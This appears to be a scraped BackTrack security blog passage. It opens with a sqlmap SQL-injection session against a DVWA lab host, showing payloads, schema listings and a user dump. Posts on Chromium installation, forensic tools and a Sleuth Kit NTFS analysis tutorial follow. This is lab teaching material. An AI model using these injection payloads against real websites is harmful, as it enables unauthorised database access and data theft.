| fri            | char(1)      |
| fromDate       | int(14)      |
| hourFrom       | varchar(4)   |
| hourTo         | varchar(4)   |
| HTMLData       | text         |
| imageData      | longblob     |
| imageName      | varchar(100) |
| imageType      | varchar(200) |
| impressions    | int(8)       |
| maxImpressions | int(8)       |
| mon            | char(1)      |
| sat            | char(1)      |
| sun            | char(1)      |
| textData       | text         |
| thu            | char(1)      |
| title          | varchar(255) |
| toDate         | int(14)      |
| tue            | char(1)      |
| url            | varchar(255) |
| useDates       | char(1)      |
| wed            | char(1)      |
| which          | varchar(50)  |
| zone           | varchar(40)  |
+----------------+--------------+

Database: tikiwiki
Table: tiki_related_categories
[2 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| categId   | int(10) |
| relatedTo | int(10) |
+-----------+---------+

Database: tikiwiki
Table: tiki_user_taken_quizzes
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| quizId | varchar(255) |
| user   | varchar(40)  |
+--------+--------------+

Database: tikiwiki
Table: tiki_users_score
[4 columns]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| event_id | char(40)  |
| expire   | int(14)   |
| tstamp   | timestamp |
| user     | char(40)  |
+----------+-----------+

Database: tikiwiki
Table: tiki_calendar_locations
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| calendarId  | int(14)      |
| callocId    | int(14)      |
| description | blob         |
| name        | varchar(255) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_cookies
[2 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| cookie   | text    |
| cookieId | int(10) |
+----------+---------+

Database: tikiwiki
Table: tiki_forums_queue
[13 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| data         | text         |
| forumId      | int(14)      |
| hash         | varchar(32)  |
| object       | varchar(32)  |
| parentId     | int(14)      |
| qId          | int(14)      |
| summary      | varchar(240) |
| timestamp    | int(14)      |
| title        | varchar(240) |
| topic_smiley | varchar(80)  |
| topic_title  | varchar(240) |
| type         | varchar(60)  |
| user         | varchar(40)  |
+--------------+--------------+

Database: tikiwiki
Table: users_grouppermissions
[3 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| groupName | varchar(255) |
| permName  | varchar(30)  |
| value     | char(1)      |
+-----------+--------------+

Database: tikiwiki
Table: tiki_drawings
[7 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| drawId        | int(12)      |
| filename_draw | varchar(250) |
| filename_pad  | varchar(250) |
| name          | varchar(250) |
| timestamp     | int(14)      |
| user          | varchar(40)  |
| version       | int(8)       |
+---------------+--------------+

Database: tikiwiki
Table: tiki_tracker_fields
[12 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| fieldId      | int(12)      |
| isHidden     | char(1)      |
| isMain       | char(1)      |
| isMandatory  | char(1)      |
| isPublic     | char(1)      |
| isSearchable | char(1)      |
| isTblVisible | char(1)      |
| name         | varchar(255) |
| options      | text         |
| position     | int(4)       |
| trackerId    | int(12)      |
| type         | char(1)      |
+--------------+--------------+

Database: tikiwiki
Table: tiki_chat_users
[3 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| channelId | int(8)       |
| nickname  | varchar(200) |
| timestamp | int(14)      |
+-----------+--------------+

Database: tikiwiki
Table: tiki_content_templates
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| content    | longblob     |
| created    | int(14)      |
| name       | varchar(200) |
| templateId | int(10)      |
+------------+--------------+

Database: tikiwiki
Table: tiki_poll_options
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| optionId | int(8)       |
| pollId   | int(8)       |
| position | int(4)       |
| title    | varchar(200) |
| votes    | int(8)       |
+----------+--------------+

Database: tikiwiki
Table: tiki_blog_activity
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| blogId | int(8)  |
| day    | int(14) |
| posts  | int(8)  |
+--------+---------+

Database: tikiwiki
Table: tiki_mailin_accounts
[17 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| account         | varchar(50)  |
| accountId       | int(12)      |
| active          | char(1)      |
| anonymous       | char(1)      |
| article_topicId | int(4)       |
| article_type    | varchar(50)  |
| attachments     | char(1)      |
| discard_after   | varchar(255) |
| pass            | varchar(100) |
| pop             | varchar(255) |
| port            | int(4)       |
| smtp            | varchar(255) |
| smtpPort        | int(4)       |
| type            | varchar(40)  |
| useAuth         | char(1)      |
| user            | varchar(40)  |
| username        | varchar(100) |
+-----------------+--------------+

Database: tikiwiki
Table: tiki_logs
[7 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| logclient  | text         |
| logId      | int(8)       |
| logip      | varchar(200) |
| logmessage | text         |
| logtime    | int(14)      |
| logtype    | varchar(20)  |
| loguser    | varchar(40)  |
+------------+--------------+

Database: tikiwiki
Table: tiki_live_support_modules
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| modId  | int(4)      |
| name   | varchar(90) |
+--------+-------------+

Database: tikiwiki
Table: tiki_directory_search
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| hits   | int(14)      |
| term   | varchar(250) |
+--------+--------------+

Database: tikiwiki
Table: tiki_tags
[11 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| comment     | varchar(200) |
| data        | longblob     |
| description | varchar(200) |
| flag        | char(1)      |
| hits        | int(8)       |
| ip          | varchar(15)  |
| lastModif   | int(14)      |
| pageName    | varchar(160) |
| tagName     | varchar(80)  |
| user        | varchar(40)  |
| version     | int(8)       |
+-------------+--------------+

Database: tikiwiki
Table: tiki_live_support_messages
[12 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| assigned_to | varchar(200) |
| data        | text         |
| email       | varchar(250) |
| module      | int(4)       |
| msgId       | int(12)      |
| priority    | int(2)       |
| resolution  | varchar(100) |
| status      | char(1)      |
| timestamp   | int(14)      |
| title       | varchar(200) |
| user        | varchar(40)  |
| username    | varchar(200) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_tracker_item_fields
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| fieldId | int(12) |
| itemId  | int(12) |
| value   | text    |
+---------+---------+

Database: tikiwiki
Table: tiki_searchwords
[2 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| searchword | varchar(80) |
| syllable   | varchar(80) |
+------------+-------------+

Database: tikiwiki
Table: tiki_webmail_messages
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| accountId | int(12)      |
| isFlagged | char(1)      |
| isRead    | char(1)      |
| isReplied | char(1)      |
| mailId    | varchar(255) |
| user      | varchar(40)  |
+-----------+--------------+

Database: tikiwiki
Table: tiki_languages
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| lang     | char(16)     |
| language | varchar(255) |
+----------+--------------+

Database: tikiwiki
Table: tiki_user_assigned_modules
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| name     | varchar(200) |
| ord      | int(4)       |
| position | char(1)      |
| type     | char(1)      |
| user     | varchar(40)  |
+----------+--------------+

Database: tikiwiki
Table: tiki_live_support_message_comments
[4 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| cId       | int(12) |
| data      | text    |
| msgId     | int(12) |
| timestamp | int(14) |
+-----------+---------+

Database: tikiwiki
Table: galaxia_roles
[5 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| description | text        |
| lastModif   | int(14)     |
| name        | varchar(80) |
| pId         | int(14)     |
| roleId      | int(14)     |
+-------------+-------------+

Database: tikiwiki
Table: tiki_content
[2 columns]
+-------------+--------+
| Column      | Type   |
+-------------+--------+
| contentId   | int(8) |
| description | text   |
+-------------+--------+

Database: tikiwiki
Table: tiki_menus
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| description | text         |
| menuId      | int(8)       |
| name        | varchar(200) |
| type        | char(1)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_live_support_operators
[11 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| accepted_requests | int(10)     |
| average_chat      | int(10)     |
| last_chat         | int(14)     |
| longest_chat      | int(10)     |
| points            | int(10)     |
| shortest_chat     | int(10)     |
| status            | varchar(20) |
| status_since      | int(14)     |
| time_online       | int(10)     |
| user              | varchar(40) |
| votes             | int(10)     |
+-------------------+-------------+

[03:49:04] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 03:49:04

Now we continue with the user dump. Here we want to see which users exist in the tables; we use the tiki_pages table as before, as follows:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ee66c40d056596d8e02129bd8ab3f095" -D tikiwiki -T tiki_pages -C user --dump

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:01:23

[05:01:23] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[05:01:23] [INFO] resuming injection data from session file
[05:01:23] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:01:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[05:01:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:01:27] [INFO] fetching columns LIKE 'user' for table 'tiki_pages' on database 'tikiwiki'
[05:01:27] [INFO] fetching entries of column(s) 'user' for table 'tiki_pages' on database 'tikiwiki'
[05:01:27] [INFO] analyzing table dump for possible password hashes
Database: tikiwiki
Table: tiki_pages
[1 entry]
+-------+
| user  |
+-------+
| admin |
+-------+

[05:01:27] [INFO] Table 'tikiwiki.tiki_pages' dumped to CSV file '/pentest/database/sqlmap/output/192.168.56.101/dump/tikiwiki/tiki_pages.csv'
[05:01:27] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 05:01:27


Friday, November 9, 2012

Install chrome simple

Installing Chromium is very simple; just follow the steps below:

root@bt:~# apt-get install chromium-browser
Reading package lists... Done
Building dependency tree      
Reading state information... Done
The following extra packages will be installed:
  chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0
The following NEW packages will be installed:
  chromium-browser chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0

root@bt:~# cd /usr/lib/chromium-browser
root@bt:/usr/lib/chromium-browser# ls
chrome.pak        chromium-browser-sandbox  libppGoogleNaClPluginChrome.so  plugins    resources.pak  xdg-settings
chromium-browser  libffmpegsumo.so          locales                         resources  xdg-mime

root@bt:/usr/lib/chromium-browser# hexedit chromium-browser
root@bt:/usr/lib/chromium-browser# tar -zxvf /root/Desktop/
.directory                                 install_flash_player_11_linux_i386.tar.gz

root@bt:/usr/lib/chromium-browser# tar -zxvf /root/Desktop/install_flash_player_11_linux_i386.tar.gz
libflashplayer.so
readme.txt
usr/
usr/bin/
usr/bin/flash-player-properties
usr/share/
usr/share/kde4/
usr/share/kde4/services/
usr/share/kde4/services/kcm_adobe_flash_player.desktop
usr/share/applications/

root@bt:/usr/lib/chromium-browser# cp libflashplayer.so /usr/lib/chromium-browser/plugins/
root@bt:/usr/lib/chromium-browser# launch chrome

Thursday, November 1, 2012

Tools in Forensic

1. Antiword
Antiword is an application used to display the text and pictures of a Microsoft Word document. Antiword only supports documents created by MS Word version 2 and version 6 or newer.

2. Autopsy
The Autopsy Forensic Browser is a graphical interface to the command-line digital investigation tool The Sleuth Kit. Together, they can analyze disks and Windows and UNIX file systems (NTFS, FAT, Ext2, UFS1/2/3).

3. Binhash
Binhash is a simple program that hashes the various sections of ELF and PE files for comparison. Currently it hashes the segment header sections of ELF objects and the section headers of PE objects.

4. Sigtool
Sigtool is a tool for managing ClamAV signatures and databases. sigtool can be used to generate MD5 checksums, convert data into hexadecimal format, list virus signatures, and build/unpack/test/verify a CVD database and update script.

5. ChaosReader
ChaosReader is a freeware tool that traces TCP/UDP/... sessions and extracts application data from tcpdump logs. It can pull telnet sessions, FTP file transfers, HTTP (HTML, GIF, JPEG, ...), SMTP email, and so on, from captured network traffic. An HTML index file is created containing links to the details of each session, including real-time replay programs for telnet, rlogin, IRC, X11 or VNC sessions, and reports such as an image report and an HTTP GET/POST content report.

6. Chkrootkit
Chkrootkit is a tool to check for signs of a rootkit. It checks whether the main system utilities are infected, and currently detects approximately 60 rootkits and their variations.

7. dcfldd
This tool was originally developed at the Department of Defense Computer Forensics Lab (DCFL). Although Nick Harbour is no longer affiliated with the DCFL, he still maintains this tool.

8. ddrescue
GNU ddrescue is a data recovery tool. It copies data from one file or block device (hard disk, CD-ROM, etc.) to another, trying hard to rescue data in case of read errors. Ddrescue does not truncate the output file unless asked to, so each time you run it on the same output file it tries to fill in the gaps.

9. Foremost
Foremost is a tool that can be used to recover files based on their headers, footers, or internal data structures. It was initially developed by Jesse Kornblum and Kris Kendall of the United States Air Force Office of Special Investigations and The Center for Information Systems Security Studies and Research. Foremost is currently maintained by Nick Mikus, a researcher at the Naval Postgraduate School Center for Information Systems Security Studies and Research.

10. Gqview
Gqview is an image viewer for GTK. It supports several image formats, zooming, panning, thumbnails, and sorting of images.

11. Galleta
Galleta is a tool written by Keith J. Jones to perform forensic analysis of Internet Explorer cookies.

12. lshw
lshw (Hardware Lister) is a small tool that provides detailed information about the hardware configuration of the machine. It can report memory configuration, firmware version, mainboard configuration, CPU version and speed, bus speed, cache configuration, etc. on DMI-capable x86 or EFI systems.

13. Pasco
A lot of computer crime investigations require reconstruction of a suspect's Internet activity. Because this analysis technique is performed regularly, Keith investigated the structure of the data found in Internet Explorer activity files (index.dat files). Pasco, which comes from Latin and means "browse", was developed to examine the contents of Internet Explorer cache files. Pasco will parse the information in index.dat files and output the results in delimited fields so they can be imported into your favorite spreadsheet program.

14. Scalpel
Scalpel is a forensic tool designed to identify, isolate and recover data from computer media throughout the forensic investigation process. Scalpel searches a hard drive, bit-stream image, unallocated file space, or any computer file for particular characteristics, content or attributes, and generates reports on the location and content of the artifacts found during the search. Scalpel also carves the artifacts it finds out as individual files.

Forensic Analysis, NTFS Examination: ADS, NTFS Examination: Sorting Files, Signature Search in Unallocated Space.

File System Forensic Analysis:

Let's create a directory in our /root (the root user's home) directory called /root/ntfs_pract/ and place the file in there. First, we will decompress the gzipped file using the gzip command we learned earlier and check its SHA1 hash:
root@bt:~# cd /root/forensic/
root@bt:~/forensic# ls
ntfs_pract.dd

root@bt:~/forensic# sha1sum ntfs_pract.dd
0cbce7666c8db70377cb5fc2abf9268821b6dafe  ntfs_pract.dd

Now we will run through a series of basic Sleuthkit commands as we would in any analysis. The structure of the forensic image is viewed using mmls:
 
root@bt:~/forensic# mmls ntfs_pract.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000000058   0000000059   Unallocated
02:  00:00   0000000059   0001023059   0001023001   NTFS (0x07)
03:  -----   0001023060   0001023999   0000000940   Unallocated

The output shows that an NTFS partition (and most likely the file system) begins at sector offset 59. This is the offset we will use in all our Sleuthkit commands. We now use fsstat to have a look at the file system statistics inside that partition:

root@bt:~/forensic# fsstat -o 59 -f ntfs ntfs_pract.dd
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: NTFS
Volume Serial Number: E4D06402D063D8F6
OEM Name: NTFS  
Volume Name: NEW VOLUME
Version: Windows XP

METADATA INFORMATION
--------------------------------------------
First Cluster of MFT: 42625
First Cluster of MFT Mirror: 63937
Size of MFT Entries: 1024 bytes
Size of Index Records: 4096 bytes
Range: 0 - 144
Root Directory: 5

CONTENT INFORMATION
--------------------------------------------
Sector Size: 512
Cluster Size: 4096
Total Cluster Range: 0 - 127874
Total Sector Range: 0 - 1022999

Looking at the fsstat output on our NTFS file system, we see it differs greatly from the output we saw running on a Linux EXT file system. The tool is designed to provide pertinent information based on the file system being targeted. Notice that when run on an NTFS file system, fsstat provides us with information specific to NTFS, including data about the Master File Table (MFT) and specific attribute values.

We will now have a look at how the Sleuthkit interacts with active and deleted files on an NTFS file system, given the structure of MFT entries. Let's begin this exercise with the output of fls. We can specify that fls only show us "deleted" content on the command line with the -d option. We will use -F (only file entries) and -r (recursive) as well:

root@bt:~/forensic# fls -Frd -o 59 ntfs_pract.dd
r/r * 42-128-1: Cookies/buckyball@revsci[2].txt
r/r * 43-128-1: Cookies/buckyball@search.msn[1].txt
r/r * 44-128-1: Cookies/buckyball@slashdot[1].txt
r/r * 45-128-1: Cookies/buckyball@sony.aol[2].txt
-/r * 112-128-4:        My Documents/My Pictures/bandit-streetortrack2005056.jpg
-/r * 116-128-4:        My Documents/My Pictures/fighterama2005-ban4.jpg
-/r * 81-128-4: My Documents/direct_attacks.doc

As of Sleuthkit version 3, the output of fls now shows content that includes NTFS "orphan" files [20]. Previous versions required the user to run an additional command, ifind, on parent directories in order to recover orphan files. The article in the footnote explains how this works.

The output above shows that our NTFS example file system holds 7 deleted files. Let's have a closer look at some NTFS specific information that can be parsed with the Sleuthkit.

Have a look at the deleted file at MFT entry 112. The file is ./My Documents/My Pictures/bandit-streetortrack2005056.jpg. We can have a closer look at the file's attributes by examining its MFT entry directly. We do this through the istat tool. Recall that when we were working on an EXT file system previously, the output of istat gave us information directly from the inode of the specified file (see Sleuthkit Exercise #1). As we mentioned earlier, the output of the Sleuthkit tools is specific to the file system being examined. So let's run the command on MFT entry 112 in our current exercise:

root@bt:~/forensic# istat -o 59 ntfs_pract.dd 112
MFT Entry Header Values:
Entry: 112        Sequence: 2
$LogFile Sequence Number: 4201668
Not Allocated File
Links: 2

$STANDARD_INFORMATION Attribute Values:
Flags: Archive
Owner ID: 0
Security ID: 259  ()
Created:        Sat Apr  7 11:52:53 2007
File Modified:  Sat Oct 14 21:37:13 2006
MFT Modified:   Sat Apr  7 11:52:53 2007
Accessed:       Sun Apr  8 07:00:04 2007

Attributes:
Type: $STANDARD_INFORMATION (16-0)   Name: N/A   Resident   size: 72
Type: $FILE_NAME (48-3)   Name: N/A   Resident   size: 90
Type: $FILE_NAME (48-2)   Name: N/A   Resident   size: 128
Type: $DATA (128-4)   Name: N/A   Non-Resident   size: 112063  init_size: 112063
60533 60534 60535 60536 60537 60538 60539 60540
60541 60542 60543 60544 60545 60546 60547 60548
60549 60550 60551 60552 60553 60554 60555 60556
60557 60558 60559 60560

The information istat provides us from the MFT shows values directly from the $STANDARD_INFORMATION attribute (which contains the basic metadata for a file), the $FILE_NAME attribute and basic information for other attributes that are part of an MFT entry. The data blocks that contain the actual file content are listed at the bottom of the output (for non-resident data).

Take note of the fact that there are two separate attribute identifiers for the $FILE_NAME attribute, 48-3 and 48-2. It is interesting to note that we can access the contents of each attribute separately using the icat command. The two attributes store the DOS (8.3) filename and the Win32 (long) file name. By piping the output of icat to xxd we can see the difference. By itself, this may not be of much investigative interest, but again we are illustrating the capabilities of the Sleuthkit tools. Note the difference in output between the attribute identifiers 112-48-3 and 112-48-2:

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112-48-3 | xxd
0000000: 6e00 0000 0000 0100 3071 be99 d078 c701  n.......0q...x..
0000010: 3071 be99 d078 c701 3071 be99 d078 c701  0q...x..0q...x..
0000020: 3071 be99 d078 c701 0000 0000 0000 0000  0q...x..........
0000030: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
0000040: 0c02 4200 4100 4e00 4400 4900 5400 7e00  ..B.A.N.D.I.T.~.
0000050: 3100 2e00 4a00 5000 4700                 1...J.P.G.

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112-48-2 | xxd
0000000: 6e00 0000 0000 0100 3071 be99 d078 c701  n.......0q...x..
0000010: 3071 be99 d078 c701 3071 be99 d078 c701  0q...x..0q...x..
0000020: 3071 be99 d078 c701 0000 0000 0000 0000  0q...x..........
0000030: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
0000040: 1f01 6200 6100 6e00 6400 6900 7400 2d00  ..b.a.n.d.i.t.-.
0000050: 7300 7400 7200 6500 6500 7400 6f00 7200  s.t.r.e.e.t.o.r.
0000060: 7400 7200 6100 6300 6b00 3200 3000 3000  t.r.a.c.k.2.0.0.
0000070: 3500 3000 3500 3600 2e00 6a00 7000 6700  5.0.5.6...j.p.g.
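To make the two hexdumps above readable without counting bytes by hand, here is a small decoder for the $FILE_NAME attribute. This is an added example, not code from the original article or from The Sleuth Kit: the two dumps are copied verbatim from the icat | xxd output above, and the field layout used is the standard NTFS $FILE_NAME layout (8-byte parent reference, four FILETIME timestamps, allocated and real size, flags, reparse value, name length, namespace byte, UTF-16LE name).

```python
"""Decode the two NTFS $FILE_NAME attributes of MFT entry 112 (48-3 and 48-2).

Added example, not part of the original article. The two hexdumps are copied
from the `icat ... | xxd` output above; the field layout is the standard
NTFS $FILE_NAME attribute layout."""
import struct
from datetime import datetime, timedelta, timezone

# Copied from the page: attribute 112-48-3 (DOS 8.3 name, 90 bytes)
DUMP_112_48_3 = """\
0000000: 6e00 0000 0000 0100 3071 be99 d078 c701  n.......0q...x..
0000010: 3071 be99 d078 c701 3071 be99 d078 c701  0q...x..0q...x..
0000020: 3071 be99 d078 c701 0000 0000 0000 0000  0q...x..........
0000030: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
0000040: 0c02 4200 4100 4e00 4400 4900 5400 7e00  ..B.A.N.D.I.T.~.
0000050: 3100 2e00 4a00 5000 4700                 1...J.P.G.
"""

# Copied from the page: attribute 112-48-2 (Win32 long name, 128 bytes)
DUMP_112_48_2 = """\
0000000: 6e00 0000 0000 0100 3071 be99 d078 c701  n.......0q...x..
0000010: 3071 be99 d078 c701 3071 be99 d078 c701  0q...x..0q...x..
0000020: 3071 be99 d078 c701 0000 0000 0000 0000  0q...x..........
0000030: 0000 0000 0000 0000 2000 0000 0000 0000  ........ .......
0000040: 1f01 6200 6100 6e00 6400 6900 7400 2d00  ..b.a.n.d.i.t.-.
0000050: 7300 7400 7200 6500 6500 7400 6f00 7200  s.t.r.e.e.t.o.r.
0000060: 7400 7200 6100 6300 6b00 3200 3000 3000  t.r.a.c.k.2.0.0.
0000070: 3500 3000 3500 3600 2e00 6a00 7000 6700  5.0.5.6...j.p.g.
"""

NAMESPACES = {0: "POSIX", 1: "Win32", 2: "DOS", 3: "Win32&DOS"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def xxd_to_bytes(dump: str) -> bytes:
    """Turn default `xxd` output back into raw bytes (hex field only)."""
    raw = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        # everything after the offset and before the double space that opens the ASCII column
        hex_field = line.split(":", 1)[1].split("  ", 1)[0]
        raw += bytes.fromhex(hex_field.replace(" ", ""))
    return bytes(raw)


def filetime_to_iso(ft: int) -> str:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to ISO 8601 in UTC."""
    return (FILETIME_EPOCH + timedelta(microseconds=ft // 10)).strftime("%Y-%m-%dT%H:%M:%SZ")


def parse_file_name_attr(raw: bytes) -> dict:
    """Parse one resident $FILE_NAME attribute body (66-byte fixed header + name)."""
    (parent_ref, created, modified, mft_modified, accessed,
     alloc_size, real_size, flags, reparse,
     name_len, namespace) = struct.unpack_from("<7QIIBB", raw, 0)
    name = raw[66:66 + 2 * name_len].decode("utf-16-le")
    return {
        "parent_entry": parent_ref & 0xFFFFFFFFFFFF,  # low 48 bits: parent MFT entry number
        "parent_seq": parent_ref >> 48,               # high 16 bits: parent sequence number
        "created": filetime_to_iso(created),
        "modified": filetime_to_iso(modified),
        "mft_modified": filetime_to_iso(mft_modified),
        "accessed": filetime_to_iso(accessed),
        "allocated_size": alloc_size,
        "real_size": real_size,
        "flags": flags,                               # 0x20 = FILE_ATTRIBUTE_ARCHIVE
        "namespace": NAMESPACES.get(namespace, f"unknown({namespace})"),
        "name": name,
        "attr_size": 66 + 2 * name_len,               # should match istat's "size:" column
    }


if __name__ == "__main__":
    for label, dump in (("112-48-3", DUMP_112_48_3), ("112-48-2", DUMP_112_48_2)):
        info = parse_file_name_attr(xxd_to_bytes(dump))
        print(label, info["namespace"], info["name"], info["created"], info["attr_size"])
```

Decoding both dumps gives the DOS name BANDIT~1.JPG (namespace 2, 90 bytes) and the Win32 name bandit-streetortrack2005056.jpg (namespace 1, 128 bytes), matching the sizes istat printed for 48-3 and 48-2. Both attributes point at parent entry 110 and carry the same four timestamps, 2007-04-07T04:52:53Z, which is istat's "Created: Sat Apr 7 11:52:53 2007" printed in the examiner's local time zone; the $FILE_NAME times are what the examiner compares against $STANDARD_INFORMATION (whose "File Modified" here reads October 2006) when looking for timestamp manipulation.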

The same idea is extended to other attributes of a file, most notably the "Alternate Data Streams" or ADS. By showing us the existence of multiple attribute identifiers for a given file, the Sleuthkit gives us a way of detecting potentially hidden data. We cover this in our next exercise.

NTFS Examination: ADS

First, to see what we are discussing here, in case the reader is not familiar with alternate data streams, we should compare the output of a normal file listing with that obtained through a forensic utility.

Obviously, when examining a system, it may be useful to get a look at all of the files contained in an image. We can do this two ways. The first way would be to simply mount our image with the loopback device and get a file listing. We will do this to compare a method using standard command line utilities that we used in the past with a method using the Sleuthkit tools.

Remember that the mount command works on file systems, not disks. The file system in this image starts 59 sectors into the image, so we mount using a byte offset (59 sectors × 512 bytes = 30208). We can then obtain a simple list of files using the find command:

root@bt:~/forensic# mount -t ntfs -o ro,loop,offset=30208 ntfs_pract.dd /mnt/analysis/
root@bt:~/forensic# cd /mnt/analysis/
root@bt:/mnt/analysis# find . -type f
./Cookies/buckyball@ad.yieldmanager[1].txt
./Cookies/buckyball@adopt.specificclick[2].txt
./Cookies/buckyball@ads.as4x.tmcs[1].txt
./Cookies/index.dat
./Desktop/dtrsetup.exe
./Favorites/MSN.com.url
./Favorites/StreetFighter Accessories - StreetFighter and Sportbike accessories. One stop shopping for StreetFighters.url
./Favorites/Two Brothers Racing.url
./My Documents/amstra~1
./My Documents/My Pictures/b45ac806a965017dd71e3382581c47f3_refined.jpg
./My Documents/My Pictures/bankor1.jpg
./NTUSER.DAT
./SVstunts.avi

root@bt:/mnt/analysis# file /mnt/analysis/SVstunts.avi
/mnt/analysis/SVstunts.avi: RIFF (little-endian) data, AVI, 160 x 120, 15.00 fps, video: Cinepak   
                      
root@bt:/mnt/analysis# cd
root@bt:~# cd /root/forensic/
root@bt:~/forensic# file /m
media/ mnt/ 

root@bt:~/forensic# file /mnt/analysis/SVstunts.avi
/mnt/analysis/SVstunts.avi: RIFF (little-endian) data, AVI, 160 x 120, 15.00 fps, video: Cinepak

root@bt:~/forensic# fls -Fr -o 59 -f ntfs_pract.dd
Unsupported file system type: ntfs_pract.dd
usage: fls [-adDFlpruvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-m dir/] [-o imgoffset] [-z ZONE] [-s seconds] image [images] [inode]
        If [inode] is not given, the root directory is used
        -a: Display "." and ".." entries
        -d: Display deleted entries only
        -D: Display only directories
        -F: Display only files
        -l: Display long version (like ls -l)
        -i imgtype: Format of image file (use '-i list' for supported types)
        -b dev_sector_size: The size (in bytes) of the device sectors
        -f fstype: File system type (use '-f list' for supported types)
        -m: Display output in mactime input format with
              dir/ as the actual mount point of the image
        -o imgoffset: Offset into image file (in sectors)
        -p: Display full path for each file
        -r: Recurse on directory entries
        -u: Display undeleted entries only
        -v: verbose output to stderr
        -V: Print version
        -z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l)
        -s seconds: Time skew of original machine (in seconds) (only useful with -l & -m)

Now let's try another method of obtaining a file list. Since this is a forensic examination, let's use a forensic tool to give us a list of files. We will use the fls command with the -F option to show only files, and the -r option to recurse through directories (starting from the root directory, by default). The "..." signifies removed output for brevity:

root@bt:~/forensic# fls -Fr -o 59 -f ntfs ntfs_pract.dd
r/r 4-128-4:    $AttrDef
r/r 1-128-1:    $MFTMirr
r/r 9-128-8:    $Secure:$SDS
r/r 9-144-11:   $Secure:$SDH
r/r 9-144-5:    $Secure:$SII
r/r 10-128-1:   $UpCase
r/r 3-128-3:    $Volume
r/r 36-128-1:   Cookies/buckyball@as-eu.falkag[2].txt
r/r 30-128-1:   Cookies/buckyball@2o7[1].txt
r/r 31-128-1:   Cookies/buckyball@ad.yieldmanager[1].txt
r/r 32-128-4:   Cookies/buckyball@adopt.specificclick[2].txt
r/r 28-128-3:   Desktop/dtrsetup.exe
r/r 74-128-4:   My Documents/anon-mail.txt

